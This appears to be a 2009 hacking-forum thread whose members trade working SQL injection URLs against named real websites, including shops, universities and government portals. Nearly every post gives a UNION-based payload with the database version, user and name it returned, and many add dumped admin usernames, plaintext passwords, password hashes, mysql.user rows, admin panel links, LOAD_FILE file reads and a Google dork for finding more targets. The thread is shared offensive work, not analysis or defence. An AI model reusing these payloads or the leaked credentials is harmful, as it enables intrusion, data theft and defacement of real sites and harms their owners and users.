http://www.aman-diir.ae/more_news.php?id=-1+union+select+1,2,concat_ws(0x20,version(),user() ,database()),4,5,6,7+from+news

version: 5.0.45
user: amanmysql@localhost
database: db_news


tables
http://www.aman-diir.ae/more_news.php?id=-1+union+select+1,2,table_name,4,5,6,7+from+informa tion_schema.tables+limit+49,1

columns
http://www.aman-diir.ae/more_news.php?id=-1+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name=%27userlist% 27+limit+2,1

insert into news
columns
News_Language
News_Title
News_Description
News_Priority
News_Date
News_Active

ReduKToR
10.06.2009, 18:09
http://www.aziendegratis.it/sito.php?linkid=-10694+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45/*

branch 4.....there are cards here....anyway, help yourself

DezMond™
10.06.2009, 18:33
http://www.vents-spb.ru/products/decor/index.php?cat_id=-234+union+select+1,2,concat_ws(0x3a3a,database(),v ersion()),4,5,6,7,8+from+mysql.user+/*+&item_id=713
sotern::4.1.22

http://www.bosch-home.com.ua/page.php?item_id=-55'+union+select+1,2,LOAD_FILE(0x2F7573722F7777772 F6273682F68746D6C2F696E6465782E706870),4,5,6,7,8,9 +from+mysql.user+/*+

http://www.siemens-pt.com.ua/?item_id=-3'+union+select+1,2,LOAD_FILE(0x2F7573722F7777772F 6273682F68746D6C2F636F6E6669672E706870),4,5,6,7,8, 9+from+mysql.user+/*+
PS I didn't find a folder where a shell could be uploaded((

ReduKToR
10.06.2009, 18:49
Well, here's another .it one
mysqld-5.0.27
http://www.newsway.it/notizie/speciale.asp?idnotizia=-17863+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17/*

Rubaka
10.06.2009, 19:10
Kyiv "Rosinka" plant

http://www.rosinka.ua/detnews.php?id=-82/**/UNION/**/SELECT/**/111111111111

Database Version: 4.1.22
Database name: rosinka
User name: u_rosinka@localhost

DezMond™
10.06.2009, 19:56
http://www.superkrovlia.ru/files/popup.php?id=-51+union+select+1,2,3,4,database(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30+/*+
vms60_skov

http://www.vniikp.ru/info_page.phtml?item_id=-2108+union+select+concat_ws(0x3a3a,login,password) ,2,3,4,5,6+from+admins+--+
admin::202cb962ac59075b964b07152d234b70 - 123

http://www.ipk-shop.ru/index.php?menu_id=12&type_id=52&subtype_id=1084&item_id=-46236+union+select+1,2,3,4,database(),6,7,8,9,10,1 1,12,13+from+mysql.user+--+&step=2'
ipkshop

http://www.mgr-n.ru/base.php?tipsd=2&o=1'&variant=-1+union+select+1,2,3,4,5,6,database(),8+/*+
mgr_n_db

erihtoney
10.06.2009, 20:18
http://gshaber.net/guncel.php?guncel_id=-14572+union+select+1,2,3,4,5,concat_ws(0x20,versio n(),user(),database()),7+from+guncel
version 5.0.67-community
user gshaber_gshaber@localhost
database gshaber_gshaber


table of users
http://gshaber.net/guncel.php?guncel_id=-14572+union+select+1,2,3,4,5,table_name,7+from+inf ormation_schema.tables+limit+28,1

columns
http://gshaber.net/guncel.php?guncel_id=-14572+union+select+1,2,3,4,5,column_name,7+from+in formation_schema.columns+where+table_name=char(112 ,111,108,108,95,117,115,101,114)+limit+1,1
and
http://gshaber.net/guncel.php?guncel_id=-14572+union+select+1,2,3,4,5,column_name,7+from+in formation_schema.columns+where+table_name=char(112 ,111,108,108,95,117,115,101,114)+limit+2,1

http://gshaber.net/guncel.php?guncel_id=-14572+union+select+1,2,3,4,5,concat_ws(0x20,userna me,userpass),7+from+poll_user


haber 0530e22dea41e24a039563139cdc215e

Rubaka
10.06.2009, 20:26
Strategic Evacuation Systems Corp

http://sescorp.us/article.php?sid=13+UNION+SELECT+1,2,3,4,5,@@versio n,7,8,9,10,11+++LIMIT+1,1/*

version()=4.1.20

filters are in place

+++AndreyDevil+++
10.06.2009, 21:07
http://www.kasparov.ru/subject.php?id=-74'+union+select+1/*

--------------------------------------------------------

Database Version: 5.0.22-log
User name: root@192.168.1.70
Database name:kasparov_main_v3


forum admin

--- gek : valentina ---

---------------------------------------------------------

AlexSatter
10.06.2009, 21:24
PR4, TIC 60
http://www.artosgroup.ru/super.php?id=141+and+substring(version(),1,1)=4

+++AndreyDevil+++
10.06.2009, 21:31
Page Rank: 9

http://www.indiana.edu/~jofr/review.php?id=822+and+substring(version(),1,1)=3

I'm upset.....

AlexSatter
10.06.2009, 23:01
PR 6
http://www.cfe.ru/eng/news/?nid=25+and+substring(version(),1,1)=3/*

----

PR2, TIC 20
http://geshe.ru/news.php?nid=125+union+select+1,2,3,4,5,6,7,8,conc at_Ws(0x3a,version(),user(),database())
5.0.41-community-log:kammal_libgeshe@98.130.2.10:kammal_geshe

SkyLine32
11.06.2009, 07:21
PR 4
http://www.vrijeschooldenhaag.nl/actueel.php?id=-11+union+select+1,2,concat_ws(char(124),version(), database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19--
Database Version: 4.1.22
Database name: vrijeschool2
User name: vrijeschool2@s005.dinamite.nl

PR 6
http://studprofkom.ntu-kpi.kiev.ua/interactiv/questions/?id=-1+UNION+SELECT+1,CONCAT_ws(Version(),Database(),Us er()),3,4,5,6,7,8--
Database Version: 4.1.22
Database name: sitemaker
User name: profkom@localhost

mailbrush
11.06.2009, 09:40
http://www.velozavod.com/window.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57u23645@10.10.153.169:u23645_velo zavod:5.0.67-log

MaSTeR GэN
11.06.2009, 10:06
wholefoodsmarket.com pr 7
inj:
http://www.wholefoodsmarket.com/recipes/recipe.php?recipeId=-2547'
DB data:

Database Version: 5.0.77-log
Database name: wfm_recipes
User name: wfm_recipes@172.16.122.36

Table users, 190k records

http://www.wholefoodsmarket.com/recipes/recipe.php?recipeId=-2547 UNION SELECT+1,concat_ws(0x1,uid,name,email,password,pwr key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27 FROM wfm_myrecipes.users limit 190000,1--

f1rebl00d
11.06.2009, 11:42
http://prager.com/sales/index.php?id=104'+and+substring(version(),1,1)=3+--+

version: 3.23.58-log
database: prager
user: basic_user@localhost

SeNaP
11.06.2009, 11:56
Site:

http://cod5zombies.com/

Version:

http://cod5zombies.com/dl.php?id=-3+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19--

Tables:
http://cod5zombies.com/dl.php?id=-3+union+select+1,2,3,unhex(hex(table_name)),5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19+from+INFORMATION _SCHEMA.TABLES--


e107_users
http://cod5zombies.com/dl.php?id=-3+union+select+1,unhex(hex(column_name)),3,4,5,6,7 ,%208,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.columns+where+table_name=0x653130375f7 5736572--
Login:Pass in md5

http://cod5zombies.com/dl.php?id=-3+union+select+1,concat_ws(0x3a,user_loginname,use r_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19+from+e107_user--

Huge thanks to R1dex :)

RulleR
11.06.2009, 12:20
[PR 4]
http://www.noswizard.com/product_desc.php?id=-101+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52
4.1.22-standard-log:noswizards:noswizards@localhost

[PR 1]
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27
5.0.77-community:cancuncl_classcancun:cancuncl_clcunmx@lo calhost
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,group_concat(table_name),4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27+from+information_schema.tables
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,group_concat(column_name),4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27+from+information_schema.columns+where +table_name=0x6672656574706c62616e6e6572735f61646d 696e
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,concat_ws(0x3a,id,admin_name, pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27+from+freetplbanners_admin
id:admin_name:pwd
1:ricardo:rjBcnBN

[PR 0]
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,conca t_ws(0x3a,version(),database(),user()),4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6
5.0.51a-log:sodager:sodager@boscgi1203.eigbox.net
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,group _concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26+from+information_ schema.tables
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,group _concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26+from+information _schema.columns+where+table_name=0x7362636c6173736 9666965645f61646d696e
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,conca t_ws(0x3a,id,admin_name,pwd),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+sbc lassified_admin
id:admin_name:pwd
1:admin:aliadmin

AlexSatter
11.06.2009, 12:40
PR4
http://www.sonorika.com/v2/people/pop.php?Id=-8513+union+select+1,concat_ws(0x3a,version(),user( ),database()),3
5.1.31-log:sonorika@62.149.199.54

Dimionx
11.06.2009, 13:00
www.imperialeg.com

http://www.imperialeg.com/russian/page.php?pg=project_details&project_id=18+union+select+1,2,3,4,5,6,7,8,9,conca t_ws(0x0b,version(),user(),database()),11,12,13,14 ,15,16,17,18,19


Version - 5.0.77-community
User - palmacom_user@localhost
DB - palmacom_db

Table admin:

http://www.imperialeg.com/russian/page.php?pg=project_details&project_id=18+union+select+1,2,3,4,5,6,7,8,9,conca t_ws(0x0b,id,username,password),11,12,13,14,15,16, 17,18,19+from+admin

admin
89a99c4142817128be9eb8e7c8966592

Admin panel:
http://www.imperialeg.com/admin/
Username - admin
Password - (needs to be decrypted 89a99c4142817128be9eb8e7c8966592)

udman
11.06.2009, 13:28
http://www.rivnepost.rovno.ua/showarticle.php?art=-005319+UNION+SELECT+0,1,2,3,4,concat_ws(0x0b,user( ),versi on(),database()),6,7,8,9,10,11,12,13,14,15,16+--+

rivnepost@localhost
4.1.22
rivnepostdb

udman
11.06.2009, 14:25
http://sibkray.ru/vn/index.php?id=-97473+UNION+SELECT+0,concat_Ws(0x0b,user(),version (),datab ase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24+--+
sibkray_site@localhost
5.0.45
sibkray_site

Tables
http://sibkray.ru/vn/index.php?id=-97473+UNION+SELECT+0,concat_Ws(0x0b,table_name,col umn_na me),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24+FROM+INFORMATION_SCHEMA.COLUMNS+LIM IT+177,1+--+

AlexSatter
11.06.2009, 14:40
https://www2.nikon.de/school.php?id=0138+union+select+1,2,3,concat_ws(0x 3a,version(),user(),database()),5,6,7/*
5.0.32-Debian_7etch10-log:nikon@localhost:nikon
Lots of tables; auth_user caught my interest: user_id, username, password, perms.
Let's dump the data:


There is also a table, auth_user_md5, with the same fields. Dump

c14cbf141ab1b7cd009356f555b607dc:kris:098f6bcd4621 d373cade4e832627b4f6:admin
135ff2008ba9e9e21084c045d0c5825d:nikon:d81e22674cc 2c1c62b84500e436e6ad8:admin

DezMond™
11.06.2009, 14:48
http://www.zababahai.ru/page/news-read.php?news=-12+UnIoN+SeLecT+1,table_name,3,4,5,6+from+informat ion_schema.tables+/*+
1::ekar@yandex.ru::100::b358721da28f6306c17fc80e4a 7eaa7d3abe300a

http://woman1.ru/vote.php?nom=-4'+union+select+1,2,table_name,4,5,6,7+from+inform ation_schema.tables+/*+

http://board.ebashmetall.ru/index.php?catid=-29+union+select+1,table_name,3,4,5+from+informatio n_schema.tables+limit+10,100+/*+

http://avtoton.net/?id=cat&type=-58+union+select+1,concat_ws(0x3a3a,login,pass)+fro m+users+/*+
avtoton::080383
http://avtoton.net/admin/

http://kraskolizey.com/books-describe.php?id=-4+union+select+1,user_name,3,password,5,6,7,8+from +users+limit+5,1+/*+
admin::neadmin
kadmin::kolizey
webmaster::webmaster
http://kraskolizey.com/admin/

AlexSatter
11.06.2009, 15:26
http://www.wpcsd.org/education/components/form/default.php?sectiondetailid=118+and+substring(vers ion(),1,1)=5


http://longisland.newsday.com/schools/school.php?id=774940+and+substring(version(),1,1)= 5/*

Kimliksiz
11.06.2009, 15:56
http://plintu.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*

admin:$1$cOzWWNQQ$4S9o1bLzmq1MIhAcSwUdR.

==============================
jokester:
can you tell me what I need to do so that you stop rewriting the thread from the beginning?

Is it really that hard to check SQL injections against the anti-repost checker?
http://bestquest.info/sql/
bid4tackle.com REPOST

I'm tired of deleting and editing your posts; if you don't follow the rules, I'll ask for a ban

Kimliksiz
11.06.2009, 16:30
http://www.1mileup.com/links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users

DezMond™
11.06.2009, 16:31
http://www.fibercity.ru/?q=art&id=-44+union+select+1,2,3,concat_ws(0x3a3a,login,pass) +from+users+/*+
superAdmin::cce37934e8857d4fab68c3bfc4946662

http://www.peskostruyka.biz/index.php?ID=-2+union+select+1,2,database(),4,5,6,7,8,9,10,11+/*+
z105024_pesk

http://allina.ru/tovar.php?tovar=65&tovid=-247+UnIoN+SeLecT+1,2,database(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19+/*+
z82987_allina

L I G A
11.06.2009, 16:35
[PR]5
www.badtasterecords.se

http://www.badtasterecords.se/bands.asp?id=-1+union+select+concat_ws(0x203a20,version(),databa se(),user(),@@version_compile_os)--
version()4.0.27-standard
database()badtaste_d
user()badtaste@w2ks4.fsdata.se
os pc-linux-gnu


______________________

[PR]3
www.podarunok.net
http://www.podarunok.net/consulting/article/?id=-1+union+select+1,2,concat_ws(0x203a20,version(),da tabase(),user(),@@version_compile_os),4,5,6,7,8--
version()4.1.22-log
database()podarunok
user()podarunok@beta
os portbld-freebsd5.5

______________________
[PR]4
www.frw.ca

http://www.frw.ca/rouge.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x203a20, version(),database(),user())--
version()4.0.18-Max
database()frw
user()frw@web49

______________________

[PR]2
www.halcyonpix.com

http://www.halcyonpix.com/view.php?id=-42+union+select+1,concat_ws(0x203a20,version(),dat abase(),user(),@@version_compile_os),3,4,5,6,7,8,9 ,10,11,12--
version()4.1.22-MAX-LOG
database()HALCYONPIX1
user()HALCYONPIX1@68.178.254.234
os UNKNOWN-LINUX-GNU


______________________
[PR]1
oldshipbar.ru

http://oldshipbar.ru/review.php?id=-1+union+select+1,concat_ws(0x203a20,version(),data base(),user(),@@version_compile_os),3--

version()5.0.67-LOG
database()U56014_OLDSHIP
user()U56014_OLDSHIP@10.10.153.200
os UNKNOWN-FREEBSD6.1

[tables]

http://oldshipbar.ru/review.php?id=-1+union+select+1,table_name,3+from+information_sch ema.tables--

RulleR
11.06.2009, 18:09
[PR 2]
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
5.0.51-2.dotdeb.0-log:funk_hair:sqluser@localhost

data from table 'mysql.user'
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,user,password,fil e_priv),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql .user--
debian-sys-maint:*8032B8C802DD880BA3E2455006707E05D247C94B
sqluser:2b50e1054b3cb08a:Y
data from table 'user'
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,group_concat(column_name),3,4,5, 6,7,8,9,10,11,12,13,14,15+from+information_schema. columns+where+table_name=0x75736572
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user
id:username:password
2:Administrat0r:ac73732f2ddfaae30a3834e87eadb79efe 39eb2f
307:system:317f1e761f2faa8da781a4762b9dcc2c5cad209 a
308:website:3ab3e0b020a6d41f3d259ddd3ed8ff27384383 9b
http://www.funkhair.com.au/login.php

aciiiD
11.06.2009, 18:13
_http://cititour.com/NYC_Movies/index.php?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables--
version 5.x.x.x

_http://www.bhnyc.com/category.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13--
version 4.x.x.x

_http://www.arcadevillage.com/agora/displaybest2.php?id=-1+union+select+version(),2--
version 5.x.x.x

_http://www.nycglass.com/index.php?id=-1+union+select+1,2,concat_ws(0x3b,name,pass),4,5,6 ,7+from+users--
the hash is a tough one(

_http://www.armofthesea.org/repertoire.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13--
4.x.x.x

http://rss.skyride.com/item.php?id=-1+union+select+1,concat_ws(0x3b,user,password),3,4 ,5,6+from+mysql.user--

aciiiD
11.06.2009, 20:54
_http://www.info.pulawy.pl/news.php?id=-3048+union+select+1,concat_ws(0x3b,pass,user()),3, 4,5,6,7,8,9,10,11,12,13+from+users--

RulleR
11.06.2009, 22:19
[PR 3]
http://www.soulshoes.co.nz/products.php?id=-3+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())
4.0.26:soulshoes_co_nz:soulshoe@localhost
=====================
[PR 3]
http://www.wineaway.com.au/app/article_view.php?id=-000006+union+select+1,2,3,convert(concat_ws(0x3a,v ersion(),database(),user())+using+latin1),5,6,7,8, 9,10
5.0.18-nt:_production_app:root@localhost

data from table 'mysql.user'
http://www.wineaway.com.au/app/article_view.php?id=-000006+union+select+1,2,3,convert(concat_ws(0x3a,u ser,password,file_priv)+using+latin1),5,6,7,8,9,10 +from+mysql.user
root:*46CFC7938B60837F46B610A2D10C248874555C14:Y
=====================
[PR 3]
http://www.sktm.in/product_detailed_search.php?id=-915+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30--&searchpage=0&sql1=product_new=0&newarr=n
5.0.22-log:sktm:sktm@localhost

data from table 'mysql.user'
http://www.sktm.in/product_detailed_search.php?id=-915+union+select+1,2,3,4,concat_ws(0x3a,user,passw ord,file_priv),6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30+from+mysql.use r--&searchpage=0&sql1=product_new=0&newarr=n
root:2a4f0ece50a065f3:Y
=====================
[PR 2]
http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15
5.0.51-2.dotdeb.0-log:loddon_heating:sqluser@localhost

data from table 'mysql.user'
http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,user,password,fil e_priv),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql .user
debian-sys-maint:*8032B8C802DD880BA3E2455006707E05D247C94B
sqluser:2b50e1054b3cb08a:Y
data from table 'user'
http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user
2:Administrat0r:ac73732f2ddfaae30a3834e87eadb79efe 39eb2f
http://www.loddonheatingcooling.com.au/login.php
=====================
[PR 0]
http://blossomsflorists.biz/product.php?id=-32+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11
4.1.22-standard:blossom_shop:blossom_gordon@localhost

Gorev
11.06.2009, 22:33
http://www.nordestfm.ro/index.php?page=6&&act=news&cid=3+AND+SUBSTRING((version()),1,1)=x


Version : 4.1.22-standard-log
User : nordestf_ne@localhost
Database : nordestf_neG
Os : pc-linux-gnu

..::TROYAN::..
11.06.2009, 23:35
http://www.komissar.ru/news/?nid=-618+union+select+1,2,3,concat_ws(0x3a,user(),versi on(),database()),5--

skuns_main@77.221.130.10:5.0.32-Debian_7etch1-log:skuns_main
TABLES:

http://www.komissar.ru/news/?nid=-618+union+select+1,2,3,group_concat(table_name,0x3 C62723E),5+from+information_schema.tables--



PR:3
TIC:100

.:[melkiy]:.
11.06.2009, 23:44
PR 1
http://www.aronis.kiev.ua/a-news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8--
4.1.22-standard-log


PR 1
http://japanmoto.com.ua/news.php?id=-1+union+select+1,2,3,4--
5.0.67-log


PR 3
http://www.gc.ua/en/news.php?id=-568+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15

,16,17,18,19,20--
5.0.51a-community


PR 4
http://www.franchising.org.ua/a-news/news.php?id=-183+union+select+1,2,3,4,5,6,7,8,9,10--
5.0.32-Debian_7etch10-log


PR 3
http://www.kiosks.com.ua/news.php?id=-183+union+select+1,2,3,4,5,6,7,8--
4.1.22-log


PR 2
http://bis-land.ru/news.php?id=-183+union+select+1,2,3,4,5,6,7--
5.0.51a-community

aciiiD
12.06.2009, 00:39
http://www.dok3.ru/individ.php?id=-1+union+select+1,table_name,3,4+from+information_s chema.tables--

Amoura
12.06.2009, 02:27
http://www.eutempusglobe.org/news.php?id=-23+union+select+1,version(),database(),user(),5,6, 7--

5.0.51a-community
cibs1_eutempusglobe
cibs1_eutempusgl@localhost

M.W.N.N.
12.06.2009, 02:28
http://doprabota.ru/viewcompany.php?eid=2467%27+union+select+1,2,conca t_ws(0x3a,version(),database(),user()),4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6+from+admin+limit+1,1/*
version():5.0.27-log
database():lj_mausiru
user():lj_mausiru@localhost

http://doprabota.ru/viewcompany.php?eid=2467%27+union+select+1,2,group _concat(username,0x3a,password),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+ admin+limit+1,1/*

admin:Gj,tlf37

http://doprabota.ru/admin/

aciiiD
12.06.2009, 02:45
http://www.vivatoshka.ru/article.php?id=-1+union+select+1,2,table_name+from+information_sch ema.tables--

XXXXXX
12.06.2009, 02:58
http://www.avtoschool.okis.ru/admin/index.php?act=edit_page&id=-17'+union+select+1,2,3,4,5,6,7+--+
Pass : 7a30b2702d

Version: 4.1.25-log
Name: avtoschool_F@localhost

aciiiD
12.06.2009, 03:38
_http://www.rijkheusden.nl/Content/base.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,password,user()),13+from+users--

aciiiD
12.06.2009, 03:45
_http://www.capinov.fr/base.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3b,user(),ver sion()),7,8,9,10,11,12,13,14,15,16,17+user--

-JC-
12.06.2009, 04:10
http://www.top.mylove.az/top.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t_ws(0x3a,id,login,pass),15,16,17,18,19,20,21+from +std_usr/*

By the way, file_priv = Y )))))

ILYAtirtir
12.06.2009, 08:26
ADMINISTRATIVE REFORM IN THE RUSSIAN FEDERATION
PR:7

http://ar.economy.gov.ru/ru/about/el_russia/contracts/?id4=48+union+select+concat_ws(0x3a,0x3a3a3a3a3a3a ,version(),database(),user())
5.0.51a-3ubuntu5.4-log:admreforma:admreforma@localhost

http://ar.economy.gov.ru/ru/about/el_russia/contracts/?id4=48+union+select+concat_ws(0x3a,ADMINISTRATOR_ ID,FIO,LOGIN,PASSWORD_MD5,EMAIL)+from+ADMINISTRATO R+limit+0,1

Gorev
12.06.2009, 09:33
http://www.universitateacraiova.ro/stire_detalii.php?id_item=2851+uNiOn+SeLecT+1,conc at_ws(0x3a,version(),database(),user(),@@version_c ompile_os),3,4,5,6,7,8,9,10,11,12,13,14,15--&titlu=Asalt%20final%20pentru%20Europa


Version: 5.0.77-percona-highperf-b13-log
Database : universitateacraiova_ro_bd
User : MihaiViteazu@192.168.88.40
Os : unknown-linux-gnu

http://universitateacraiova.ro/admin/login.php

Login: Adrian
Password: Мичаел (transliterated, greetings to the Turkish hackers)

erihtoney
12.06.2009, 11:08
Official website of the government of the Republic of Abkhazia, Georgia

http://www.abkhazia.gov.ge/index.php?lng=eng&page=view_news&id=-12+union+select+1,2,concat_ws(0x20,version(),user( ),database()),4,5,6,7--

4.1.22-standard
abkhazia_abkhazi@localhost
abkhazia_abkhazia

farex
12.06.2009, 12:12
<<Plastic panel manufacturing>>
http://www.plastek-tlt.ru/remont.php?id=-144965+union+select+concat_ws(0x3a2a3a,version(),d atabase(),user(),@@version_compile_os)--+
4.1.25-log:*:db00128047:*:00128047@localhost:*:unknown-freebsd4.10

Dimionx
12.06.2009, 12:43
Found a buggy engine
Searching for such sites on Google:
inurl:guest_book_sp/show_user.php?id=

An example of one such site:
www.kwota.ru
[PR: 2 TIC: 230]
9 fields
mysql.user :
http://www.kwota.ru/guest_book_sp/show_user.php?id=-5381'+union+select+1,concat_ws(0x0b,user,password) ,3,4,5,6,7,8,9+from+mysql.user/*
root ;*FF80FA6E66C1D5FFEABE55E57F02EE3691459C26
There is a users table
http://www.kwota.ru/guest_book_sp/show_user.php?id=-5381'+union+select+1,group_concat(0x0b,id),3,4,5,6 ,7,8,9+from+users/*

Only the id column can be read ((


Here, I googled up a list of sites running this engine; every one of them has SQL inj))
(105 vulnerable sites)
Help yourselves (not a single repost):


M.W.N.N.
12.06.2009, 14:43
-=WWF greens, animal defenders =-

http://www.wwfsa.org.za/print.php?id=506+union+select+1,2,3,4,5,6,concat_w s(0x3a,version(),database(),user()),8,9,10,11,12,1 3+limit+1,1/*

version():4.1.22
database():panda
user():panda@localhost

http://www.wwfsa.org.za/print.php?id=506+union+select+1,2,3,4,5,6,group_co ncat(username,0x3a,password),8,9,10,11,12,13+from+ user+limit+1,1/*

corne:carolYn
xx:akales44

TELO
12.06.2009, 15:14
http://avatar.su/avatar_static_ru_id_100x100_avatar.php?id=-1713%20union%20select%201,2,3,4,5,6,7,concat_ws(0x 20,version(),user(%20),database()),9,10,11%20--

4.1.22-log dominator_avatar@10.1.41.13 dominator_avatar

Dimionx
12.06.2009, 16:20
www.binainsan.co.id

http://www.binainsan.co.id/announcement/view_announcement.php?announcementid=192+union+sel ect+1,concat_ws(0x0b,version(),user(),database()), 3,4,5

Version - 5.0.51a-24+lenny1-log
User - as@localhost
DB - bina

Users table

http://www.binainsan.co.id/announcement/view_announcement.php?announcementid=192+union+sel ect+1,concat_ws(0x0b,password,name),3,4,5+from+tbl user


admin ; admin

M.W.N.N.
12.06.2009, 16:35
http://www.outdoormarine.co.za/boat_details.php?id=27+union+select+1,2,concat_ws( 0x3a,version(),database(),user()),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28+limit+1,1/*
version():5.0.32-Debian_7etch10
database():db_outdoormarine
user():outdoorm_1@dedi43.jnb2.host-h.net

http://www.outdoormarine.co.za/boat_details.php?id=27+union+select+1,2,concat_ws( 0x3a,user_id,username,user_password),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28+from+bb_users+limit+1,1/*

Jokester
12.06.2009, 17:09
Due to the growing number of defacements, a decision has been made to stop posting admin panel accounts (including hashes) in this thread. The corresponding rule has been added to the first post. From today, starting with this post, all passwords and hashes will be deleted, and violators will be punished.

Thank you for your attention

SkyLine32
12.06.2009, 17:54
PR 5
http://uzyjwyobrazni.pl/projekt.php?id=170+union+select+concat_ws(version( ),database(),user()),2,3--
Database Version: 4.1.22
Database name: uzyjwyobrazni
User name: uzyjwyobrazni@localhost

DezMond™
12.06.2009, 18:12
http://www.freeflowers.ru/?m=-3+union+select+1,concat_ws(0x3a3a,id,nam,pas1,pas2 ,blk,pay,dat),3+from+cln+/*+&p=77&r=0&g=1


http://xbox-freedom.ru/consoles.php?id=-2'+union+select+1,user(),3,4,5,6,7,8,9,10+--+
z86420_v5@77.221.130.18

http://www.ces-expedition.ru/?module=17&part=single&item=-174+union+select+1,2,3,4,concat_Ws(0x3a3a,FK_ID,FC _LOGIN,FC_PWD,FC_NAME),6,7,8,9,10,11+from+core_use rs+/*+

HAXTA4OK
13.06.2009, 10:10
PR 6

http://informatics.iupui.edu/events/event.php?id=-873'+union+select+1,concat_ws(0x3a,user(),database (),version()),3,4,5,6,7,8,9/*

nm_info@in-info-web1:nm_info:5.0.27-max-log

